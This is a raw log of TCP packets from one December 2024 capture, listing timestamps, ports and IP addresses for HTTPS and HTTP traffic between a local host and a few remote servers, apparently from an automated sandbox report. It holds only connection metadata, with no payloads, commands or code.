Dec 15, 2024 20:47:41.891436100 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:42.881047964 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:42.881218910 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:42.881342888 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:42.937275887 CET	49746	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:42.937310934 CET	443	49746	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:44.166637897 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.166731119 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.167048931 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.167048931 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.167131901 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.524851084 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.524940014 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.525238037 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.525407076 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.525441885 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.574573040 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.574615955 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.574819088 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.575114012 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.575135946 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.742739916 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.742825031 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:44.743029118 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.743585110 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:44.743619919 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.898503065 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.898978949 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:45.899055958 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.900669098 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.900758028 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:45.902190924 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:45.902288914 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.902363062 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:45.943327904 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.945241928 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:45.945267916 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:45.992114067 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.223978996 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.224479914 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.224512100 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.226022959 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.226084948 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.232105017 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.232199907 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.232297897 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.232314110 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.272552967 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.275154114 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.275974989 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.275993109 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.277446985 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.277523994 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.277955055 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.278037071 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.278127909 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.319426060 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.319437981 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.366290092 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.439515114 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.439732075 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.439764023 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.441188097 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.441255093 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.441534996 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.441615105 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.491281033 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.491292953 CET	443	49755	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.538171053 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.758100033 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.758232117 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.758308887 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.758326054 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.764656067 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.764714956 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.764725924 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.767117977 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:46.767179012 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.767256975 CET	49752	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:46.767270088 CET	443	49752	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.108361006 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.108496904 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.108572006 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.108648062 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.108756065 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.108757019 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.108827114 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.126883030 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.126993895 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.127051115 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.127651930 CET	49754	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.127667904 CET	443	49754	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.130810976 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.130907059 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.130906105 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.130970955 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.131030083 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.141191006 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.145462990 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.146265030 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.146289110 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.198633909 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.232788086 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.287708998 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.287770987 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.299695015 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.299762011 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.299841881 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.310451984 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.311187029 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.311249971 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.320023060 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.320099115 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.320118904 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.333084106 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.333147049 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.333163023 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.346816063 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.351255894 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.351353884 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.360306025 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.360513926 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.360575914 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.373112917 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.373315096 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.373378038 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.386456966 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.386667013 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.386729002 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.396564960 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.396627903 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.396694899 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.409359932 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.409554958 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.409616947 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.422591925 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.422794104 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.422856092 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.435739994 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.435900927 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.435965061 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.490816116 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.491934061 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.493257999 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.493419886 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.493484020 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.501684904 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.501770973 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.501846075 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.501912117 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.501967907 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.506186962 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.518102884 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.518244028 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.518291950 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.518357992 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.518430948 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.525959969 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.537621021 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.537715912 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.537789106 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.537858009 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.537961960 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.548386097 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.559220076 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.559287071 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.559369087 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.569274902 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.569360971 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.569482088 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.569547892 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.569614887 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.579401016 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.589413881 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.589529037 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.589780092 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.589843035 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.589903116 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.599576950 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.610158920 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.610239983 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.610235929 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.610305071 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.610358953 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.619851112 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.629580021 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.629642963 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.629658937 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.638104916 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.638166904 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.638181925 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.646843910 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.646915913 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.646929979 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.655520916 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.655617952 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.655620098 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.655643940 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.655782938 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.662650108 CET	49730	80	192.168.2.4	152.199.19.74
Dec 15, 2024 20:47:47.664035082 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.671693087 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.671781063 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.671855927 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.671873093 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.673060894 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.679902077 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.689080954 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.689148903 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.689162970 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.693408966 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.693475008 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.693489075 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.698687077 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.698745966 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.698761940 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.703958035 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.704044104 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.704098940 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.704113960 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.705059052 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.709117889 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.714692116 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.714762926 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.714782000 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.719683886 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.719734907 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.719748974 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.719840050 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.719894886 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.719907999 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.724824905 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.724908113 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.724940062 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.724971056 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.725050926 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.729746103 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.730967999 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.731024981 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.731103897 CET	49753	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:47.731126070 CET	443	49753	142.250.181.132	192.168.2.4
Dec 15, 2024 20:47:47.783780098 CET	80	49730	152.199.19.74	192.168.2.4
Dec 15, 2024 20:47:47.783845901 CET	49730	80	192.168.2.4	152.199.19.74
Dec 15, 2024 20:47:48.651968956 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:48.652059078 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:48.652235031 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:48.652777910 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:48.652795076 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:49.781146049 CET	49755	443	192.168.2.4	142.250.181.132
Dec 15, 2024 20:47:49.793911934 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:49.793998003 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:49.794370890 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:49.794712067 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:49.794749022 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:50.088766098 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:50.089379072 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:50.089797020 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:50.089807034 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:50.091372013 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:50.091377974 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.152482033 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.152549982 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.152574062 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.152611971 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.152641058 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.152700901 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.153403997 CET	49761	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.153420925 CET	443	49761	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.252306938 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.254113913 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.254395962 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.254424095 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.255907059 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.255922079 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.256011963 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.256046057 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.256059885 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.256071091 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.272207022 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.272253990 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.275158882 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.275190115 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.278310061 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.278386116 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.278537035 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.278553009 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.278784037 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.278840065 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.278888941 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.278911114 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.278928041 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.278944969 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.279094934 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.279140949 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.805257082 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.805305004 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:51.805386066 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.805566072 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:51.805574894 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.195416927 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.195518017 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.195583105 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.195622921 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.195643902 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.195674896 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.196485043 CET	49766	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.196516991 CET	443	49766	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.204041004 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.204119921 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.204430103 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.204438925 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.205854893 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.205859900 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.205955982 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.205965042 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.206028938 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.206041098 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.206089973 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.206096888 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.860724926 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.860816956 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:53.860968113 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.861355066 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:53.861437082 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:54.683943033 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:54.684025049 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:54.684036016 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:54.684230089 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:54.684947014 CET	49767	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:54.684961081 CET	443	49767	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:54.855499029 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:54.855542898 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:54.855726957 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:54.855958939 CET	49769	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:54.855969906 CET	443	49769	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.028255939 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.028345108 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.028783083 CET	49768	443	192.168.2.4	116.203.12.241
Dec 15, 2024 20:47:56.028806925 CET	443	49768	116.203.12.241	192.168.2.4
Dec 15, 2024 20:47:56.030714989 CET	49768	443	192.168.2.4	116.203.12.241
